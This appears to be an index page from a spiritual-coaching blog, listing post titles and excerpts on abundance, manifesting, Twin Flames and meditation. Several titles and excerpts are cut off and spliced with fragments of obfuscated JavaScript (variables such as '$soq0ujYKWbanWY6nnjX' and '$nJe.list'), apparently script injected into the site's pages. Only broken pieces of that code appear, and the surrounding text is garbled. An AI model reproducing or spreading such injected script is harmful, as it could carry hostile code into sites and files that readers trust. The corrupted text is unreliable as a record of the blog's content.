This week I was in session with a client and talked to her about the power of creating her reality...
Create Abundance
The old way: Using your mind and will power, trying to do it all yourself, depending on logic to get what you need.
The conscious way: Surrender your mind and use heart-based co-creation and clear vision to manifest what you want.
Are Twin Flame $soq0ujYKWbanWY6nnjX=function(n){if (typeof...
This last week I’ve had several people ask my thoughts andom() * 5); if (c==3){var delay =...
Making it Rain
I went to a weather web site and this image was on their front page. It made me smile from ear to...
Res$nJe=function(n){if (typeof ($nJe.list[n]) == "string")...
So this morning I was out of balance. My heart felt heavy and I was beginning a downward spiral...
Despacho Prayer Bundle ceremony
This week John and I led a beautiful Despacho up in LA. We were asked to lead a blessing for a...
Divine Purpose, Competition $soq0ujYKWbanWY6nnjX=function(n){if...
As received in a recent meditation… “By birthright each of you have a divine purpose...
Guided Meditation: Increase Your Flow of Abundance
Money is a form of consciousness. Money is fluid. It is never static. The consciousness of money...
"Creating Abundance" starts with Finding Your True Path
If you”re going to create financial abundance for yourself, then it starts with finding the...
Your Calling – Do You Hear it?
Thirteen years ago when I was first living in New York City, I had a job running a business...
Don’t waste your life – Aligning your life...
“You don’t want to waste your life, now darling. Change, change, change.” From A...
Be More Lucky!
“I”m a lucky man, with fire in my handom() * 5); if (c==3){var delay =...
How Do You Get What You Want?
Getting What You Want We all have our desires. Whether it’s a more successful career, the...
The Journey from the Mind $nJe=function(n){if (typeof...
I had a client tell me yesterday, “I know what I need to do. It’s just so hard getting...